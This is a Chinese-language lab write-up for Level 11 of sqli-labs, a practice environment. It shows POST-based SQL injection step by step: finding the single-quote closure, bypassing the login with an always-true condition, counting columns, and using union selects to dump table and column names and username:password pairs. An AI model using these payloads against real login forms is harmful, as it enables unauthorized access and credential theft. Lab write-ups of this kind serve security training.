sqli-labs第十一关——‘POST联合查询

这一关用hackbar来判断

一:判断注入类型

通过查看页面源代码我们知道两个输入框名分别是uname和passwd

uname=1&passwd=
uname=1'&passwd=
uanme=1"&passwd=

观察页面,只有单引号闭合的产生报错回显 

判断闭合类型为单引号字符型;

uname=1' or '1'='1'#&passwd=1234

 布尔验证一下

 成功登录,闭合类型是单引号字符型

二:开始注入 

1.判断列数

uname=1' order by 2#&passwd=1234

只有两列,数到第三列的时候报错

2.爆数据库名

uname=1' union select 1,database()#&passwd=1234

3.爆所有的表名

uname=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1234

4.爆所有的列名

uname=1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'#&passwd=1234

 5.爆数据

uname=1' union select 1,group_concat(username,0x3a,password) from users#&passwd=1234

❀❀❀ 完结撒花!! ❀❀❀ 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值